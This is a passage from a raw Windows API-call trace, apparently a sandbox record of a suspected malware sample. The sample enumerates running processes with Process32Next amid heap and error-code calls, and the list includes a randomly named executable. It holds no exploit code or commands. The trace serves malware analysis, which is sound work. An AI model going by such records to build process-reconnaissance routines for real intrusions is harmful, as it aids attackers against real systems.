(dwErrCode=0x0) [0110.285] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.285] GetLastError () returned 0x0 [0110.285] SetLastError (dwErrCode=0x0) [0110.285] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.285] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6858 | out: hHeap=0x29a0000) returned 1 [0110.285] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970ba0 | out: hHeap=0x29a0000) returned 1 [0110.285] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.285] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970650 [0110.285] GetLastError () returned 0x0 [0110.285] SetLastError (dwErrCode=0x0) [0110.285] GetLastError () returned 0x0 [0110.285] SetLastError (dwErrCode=0x0) [0110.286] GetLastError () returned 0x0 [0110.286] SetLastError (dwErrCode=0x0) [0110.286] GetLastError () returned 0x0 [0110.286] SetLastError (dwErrCode=0x0) [0110.286] GetLastError () returned 0x0 [0110.286] SetLastError (dwErrCode=0x0) [0110.288] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970650 | out: hHeap=0x29a0000) returned 1 [0110.288] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0110.289] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68d8 [0110.289] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d00 [0110.289] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69c8 [0110.289] GetLastError () returned 0x0 [0110.289] SetLastError (dwErrCode=0x0) [0110.289] GetLastError () returned 0x0 [0110.289] SetLastError (dwErrCode=0x0) [0110.289] GetLastError () returned 0x0 [0110.289] SetLastError (dwErrCode=0x0) [0110.289] GetLastError () returned 0x0 [0110.289] SetLastError (dwErrCode=0x0) [0110.289] GetLastError () returned 0x0 [0110.289] SetLastError (dwErrCode=0x0) [0110.289] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970448 [0110.290] GetLastError () returned 0x0 [0110.290] SetLastError (dwErrCode=0x0) [0110.290] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970448 | out: hHeap=0x29a0000) returned 1 [0110.290] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a69c8 | out: hHeap=0x29a0000) returned 1 [0110.290] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d00 | out: hHeap=0x29a0000) returned 1 [0110.290] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68d8 | out: hHeap=0x29a0000) returned 1 [0110.290] GetLastError () returned 0x0 [0110.291] SetLastError (dwErrCode=0x0) [0110.291] GetLastError () returned 0x0 [0110.291] SetLastError (dwErrCode=0x0) [0110.291] GetLastError () returned 0x0 [0110.291] SetLastError (dwErrCode=0x0) [0110.291] GetLastError () returned 0x0 [0110.291] SetLastError (dwErrCode=0x0) [0110.291] GetLastError () returned 0x0 [0110.291] SetLastError (dwErrCode=0x0) [0110.291] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.292] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.292] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970dc0 [0110.292] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.292] GetLastError () returned 0x0 [0110.292] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970380 [0110.293] GetLastError () returned 0x0 [0110.293] SetLastError (dwErrCode=0x0) [0110.293] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970380 | out: hHeap=0x29a0000) returned 1 [0110.294] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6878 | out: hHeap=0x29a0000) returned 1 [0110.294] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.294] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.294] GetLastError () returned 0x0 [0110.294] SetLastError (dwErrCode=0x0) [0110.294] GetLastError () returned 0x0 [0110.294] SetLastError (dwErrCode=0x0) [0110.294] GetLastError () returned 0x0 [0110.294] SetLastError (dwErrCode=0x0) [0110.294] GetLastError () returned 0x0 [0110.294] SetLastError (dwErrCode=0x0) [0110.294] GetLastError () returned 0x0 [0110.294] SetLastError (dwErrCode=0x0) [0110.294] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0110.295] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68e8 [0110.295] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970f00 [0110.295] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68c8 [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.296] GetLastError () returned 0x0 [0110.296] SetLastError (dwErrCode=0x0) [0110.297] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0110.297] GetLastError () returned 0x0 [0110.297] SetLastError (dwErrCode=0x0) [0110.297] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0110.297] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68c8 | out: hHeap=0x29a0000) returned 1 [0110.297] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970f00 | out: hHeap=0x29a0000) returned 1 [0110.297] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68e8 | out: hHeap=0x29a0000) returned 1 [0110.297] GetLastError () returned 0x0 [0110.297] SetLastError (dwErrCode=0x0) [0110.297] GetLastError () returned 0x0 [0110.297] SetLastError (dwErrCode=0x0) [0110.297] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x445) returned 0x29a6ec0 [0110.297] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6bd8 | out: hHeap=0x29a0000) returned 1 [0110.297] GetLastError () returned 0x0 [0110.297] SetLastError (dwErrCode=0x0) [0110.297] GetLastError () returned 0x0 [0110.298] SetLastError (dwErrCode=0x0) [0110.298] GetLastError () returned 0x0 [0110.298] SetLastError (dwErrCode=0x0) [0110.298] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0110.299] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.299] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e40 [0110.299] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.299] GetLastError () returned 0x0 [0110.299] SetLastError (dwErrCode=0x0) [0110.299] GetLastError () returned 0x0 [0110.299] SetLastError (dwErrCode=0x0) [0110.299] GetLastError () returned 0x0 [0110.299] SetLastError (dwErrCode=0x0) [0110.299] GetLastError () returned 0x0 [0110.299] SetLastError (dwErrCode=0x0) [0110.299] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.300] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.300] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.300] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.300] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.300] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970678 [0110.300] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.300] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970678 | out: hHeap=0x29a0000) returned 1 [0110.300] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6918 | out: hHeap=0x29a0000) returned 1 [0110.300] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e40 | out: hHeap=0x29a0000) returned 1 [0110.300] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.300] GetLastError () returned 0x0 [0110.300] SetLastError (dwErrCode=0x0) [0110.301] GetLastError () returned 0x0 [0110.301] SetLastError (dwErrCode=0x0) [0110.301] GetLastError () returned 0x0 [0110.301] SetLastError (dwErrCode=0x0) [0110.301] GetLastError () returned 0x0 [0110.301] SetLastError (dwErrCode=0x0) [0110.301] GetLastError () returned 0x0 [0110.301] SetLastError (dwErrCode=0x0) [0110.301] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0110.302] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.302] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e00 [0110.302] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6988 [0110.302] GetLastError () returned 0x0 [0110.302] SetLastError (dwErrCode=0x0) [0110.302] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970588 [0110.303] GetLastError () returned 0x0 [0110.303] SetLastError (dwErrCode=0x0) [0110.303] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970588 | out: hHeap=0x29a0000) returned 1 [0110.303] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6988 | out: hHeap=0x29a0000) returned 1 [0110.304] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e00 | out: hHeap=0x29a0000) returned 1 [0110.304] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0110.304] GetLastError () returned 0x0 [0110.304] SetLastError (dwErrCode=0x0) [0110.304] GetLastError () returned 0x0 [0110.304] SetLastError (dwErrCode=0x0) [0110.304] GetLastError () returned 0x0 [0110.304] SetLastError (dwErrCode=0x0) [0110.304] GetLastError () returned 0x0 [0110.304] SetLastError (dwErrCode=0x0) [0110.304] GetLastError () returned 0x0 [0110.304] SetLastError (dwErrCode=0x0) [0110.304] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0110.305] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.305] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970da0 [0110.305] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6888 [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.306] GetLastError () returned 0x0 [0110.306] SetLastError (dwErrCode=0x0) [0110.307] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706a0 [0110.307] GetLastError () returned 0x0 [0110.307] SetLastError (dwErrCode=0x0) [0110.307] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706a0 | out: hHeap=0x29a0000) returned 1 [0110.307] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6888 | out: hHeap=0x29a0000) returned 1 [0110.307] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970da0 | out: hHeap=0x29a0000) returned 1 [0110.307] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6878 | out: hHeap=0x29a0000) returned 1 [0110.307] GetLastError () returned 0x0 [0110.307] SetLastError (dwErrCode=0x0) [0110.307] GetLastError () returned 0x0 [0110.307] SetLastError (dwErrCode=0x0) [0110.307] GetLastError () returned 0x0 [0110.307] SetLastError (dwErrCode=0x0) [0110.307] GetLastError () returned 0x0 [0110.307] SetLastError (dwErrCode=0x0) [0110.307] GetLastError () returned 0x0 [0110.307] SetLastError (dwErrCode=0x0) [0110.308] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0110.308] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a68f8 [0110.309] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970e60 [0110.309] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6868 [0110.309] GetLastError () returned 0x0 [0110.309] SetLastError (dwErrCode=0x0) [0110.309] GetLastError () returned 0x0 [0110.309] SetLastError (dwErrCode=0x0) [0110.309] GetLastError () returned 0x0 [0110.309] SetLastError (dwErrCode=0x0) [0110.309] GetLastError () returned 0x0 [0110.309] SetLastError (dwErrCode=0x0) [0110.309] GetLastError () returned 0x0 [0110.309] SetLastError (dwErrCode=0x0) [0110.309] GetLastError () returned 0x0 [0110.310] SetLastError (dwErrCode=0x0) [0110.310] GetLastError () returned 0x0 [0110.310] SetLastError (dwErrCode=0x0) [0110.310] GetLastError () returned 0x0 [0110.310] SetLastError (dwErrCode=0x0) [0110.310] GetLastError () returned 0x0 [0110.310] SetLastError (dwErrCode=0x0) [0110.310] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706f0 [0110.310] GetLastError () returned 0x0 [0110.310] SetLastError (dwErrCode=0x0) [0110.310] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0110.310] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6868 | out: hHeap=0x29a0000) returned 1 [0110.310] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970e60 | out: hHeap=0x29a0000) returned 1 [0110.311] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a68f8 | out: hHeap=0x29a0000) returned 1 [0110.311] GetLastError () returned 0x0 [0110.311] SetLastError (dwErrCode=0x0) [0110.311] GetLastError () returned 0x0 [0110.311] SetLastError (dwErrCode=0x0) [0110.311] GetLastError () returned 0x0 [0110.311] SetLastError (dwErrCode=0x0) [0110.311] GetLastError () returned 0x0 [0110.311] SetLastError (dwErrCode=0x0) [0110.311] GetLastError () returned 0x0 [0110.311] SetLastError (dwErrCode=0x0) [0110.311] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.312] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6858 [0110.313] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d60 [0110.313] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6988 [0110.313] GetLastError () returned 0x0 [0110.313] SetLastError (dwErrCode=0x0) [0110.313] GetLastError () returned 0x0 [0110.313] SetLastError (dwErrCode=0x0) [0110.313] GetLastError () returned 0x0 [0110.313] SetLastError (dwErrCode=0x0) [0110.313] GetLastError () returned 0x0 [0110.313] SetLastError (dwErrCode=0x0) [0110.314] GetLastError () returned 0x0 [0110.314] SetLastError (dwErrCode=0x0) [0110.314] GetLastError () returned 0x0 [0110.314] SetLastError (dwErrCode=0x0) [0110.314] GetLastError () returned 0x0 [0110.314] SetLastError (dwErrCode=0x0) [0110.314] GetLastError () returned 0x0 [0110.314] SetLastError (dwErrCode=0x0) [0110.314] GetLastError () returned 0x0 [0110.314] SetLastError (dwErrCode=0x0) [0110.314] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0110.314] GetLastError () returned 0x0 [0110.314] SetLastError (dwErrCode=0x0) [0110.314] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0110.314] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6988 | out: hHeap=0x29a0000) returned 1 [0110.315] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d60 | out: hHeap=0x29a0000) returned 1 [0110.315] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6858 | out: hHeap=0x29a0000) returned 1 [0110.315] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970600 [0110.315] GetLastError () returned 0x0 [0110.315] SetLastError (dwErrCode=0x0) [0110.315] GetLastError () returned 0x0 [0110.315] SetLastError (dwErrCode=0x0) [0110.315] GetLastError () returned 0x0 [0110.315] SetLastError (dwErrCode=0x0) [0110.315] GetLastError () returned 0x0 [0110.315] SetLastError (dwErrCode=0x0) [0110.315] GetLastError () returned 0x0 [0110.315] SetLastError (dwErrCode=0x0) [0110.315] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970600 | out: hHeap=0x29a0000) returned 1 [0110.315] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0110.316] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6918 [0110.317] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970dc0 [0110.317] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6968 [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.317] GetLastError () returned 0x0 [0110.317] SetLastError (dwErrCode=0x0) [0110.318] GetLastError () returned 0x0 [0110.318] SetLastError (dwErrCode=0x0) [0110.318] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.318] GetLastError () returned 0x0 [0110.318] SetLastError (dwErrCode=0x0) [0110.318] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.318] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6968 | out: hHeap=0x29a0000) returned 1 [0110.318] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970dc0 | out: hHeap=0x29a0000) returned 1 [0110.318] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6918 | out: hHeap=0x29a0000) returned 1 [0110.318] GetLastError () returned 0x0 [0110.318] SetLastError (dwErrCode=0x0) [0110.318] GetLastError () returned 0x0 [0110.318] SetLastError (dwErrCode=0x0) [0110.319] GetLastError () returned 0x0 [0110.319] SetLastError (dwErrCode=0x0) [0110.319] GetLastError () returned 0x0 [0110.319] SetLastError (dwErrCode=0x0) [0110.319] GetLastError () returned 0x0 [0110.319] SetLastError (dwErrCode=0x0) [0110.319] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0110.320] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6878 [0110.320] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970d80 [0110.320] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6808 [0110.320] GetLastError () returned 0x0 [0110.320] SetLastError (dwErrCode=0x0) [0110.320] GetLastError () returned 0x0 [0110.320] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970628 [0110.321] GetLastError () returned 0x0 [0110.321] SetLastError (dwErrCode=0x0) [0110.321] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970628 | out: hHeap=0x29a0000) returned 1 [0110.321] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0110.321] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970d80 | out: hHeap=0x29a0000) returned 1 [0110.322] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6878 | out: hHeap=0x29a0000) returned 1 [0110.322] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39706c8 [0110.322] GetLastError () returned 0x0 [0110.322] SetLastError (dwErrCode=0x0) [0110.322] GetLastError () returned 0x0 [0110.322] SetLastError (dwErrCode=0x0) [0110.322] GetLastError () returned 0x0 [0110.322] SetLastError (dwErrCode=0x0) [0110.322] GetLastError () returned 0x0 [0110.325] SetLastError (dwErrCode=0x0) [0110.325] GetLastError () returned 0x0 [0110.325] SetLastError (dwErrCode=0x0) [0110.325] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706c8 | out: hHeap=0x29a0000) returned 1 [0110.326] Process32Next (in: hSnapshot=0x35c, lppe=0x19f4f4 | out: lppe=0x19f4f4*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationmorningby.exe")) returned 1 [0110.326] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a6958 [0110.327] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970c60 [0110.327] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a69b8 [0110.327] GetLastError () returned 0x0 [0110.327] SetLastError (dwErrCode=0x0) [0110.327] GetLastError () returned 0x0 [0110.327] SetLastError (dwErrCode=0x0) [0110.327] GetLastError () returned 0x0 [0110.327] SetLastError (dwErrCode=0x0) [0110.327] GetLastError () returned 0x0 [0110.327] SetLastError (dwErrCode=0x0) [0110.327] GetLastError () returned 0x0 [0110.327] SetLastError (dwErrCode=0x0) [0110.327] GetLastError () returned 0x0 [0110.327] SetLastError (dwErrCode=0x0) [0110.327] GetLastError () returned 0x0 [0110.328] SetLastError (dwErrCode=0x0) [0110.328] GetLastError () returned 0x0 [0110.328] SetLastError (dwErrCode=0x0) [0110.328] GetLastError () returned 0x0 [0110.328] SetLastError (dwErrCode=0x0) [0110.328] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0110.328] GetLastError () returned 0x0 [0110.328] SetLastError (dwErrCode=0x0) [0110.328] HeapFree (in: 